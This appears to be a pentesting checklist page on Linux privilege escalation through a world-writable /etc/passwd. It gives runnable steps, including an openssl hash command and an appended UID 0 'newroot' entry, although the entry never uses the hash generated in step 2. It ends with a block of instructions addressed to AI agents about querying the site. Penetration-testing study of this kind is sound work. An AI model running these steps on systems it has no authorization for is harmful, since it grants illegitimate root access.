# Writable /etc/passwd ### Overview The `/etc/passwd` file defines: * Usernames * User IDs (UIDs) * Group IDs (GIDs) * Home directories * Login shells If `/etc/passwd` is writable by a non-root user, an attacker can: * Create a new root-level user * Modify an existing user to gain root privileges * Achieve immediate privilege escalation ### Why this Works Linux grants root privileges based on **UID**, not username. * UID `0` = root * Any account with UID `0` has full system privileges The system: * Does **not** validate who created the entry * Does **not** alert on changes by default * Fully trusts `/etc/passwd` at login ### Prerequisites 1. Local access as a non root user. 2. `/etc/passwd` is writable. ### Steps 1. Confirm whether `/etc/passwd` is writable by the current user ```bash ls -l /etc/passwd ``` 2. Generate a DES crypt hash password locally ```bash # Using openssl openssl passwd anypasshere ``` 3. Open `/etc/passwd` and add a new entry at the end of the file referencing a new root user (Eg: `newroot`) ```bash newroot::0:0:root:/root:/bin/bash ``` 4. Login as the new root user by running `su newroot`. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://gokulkarthik.gitbook.io/pentesting-checklist/linux/linux-privilege-escalation/weak-file-permissions/writable-etc-passwd.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.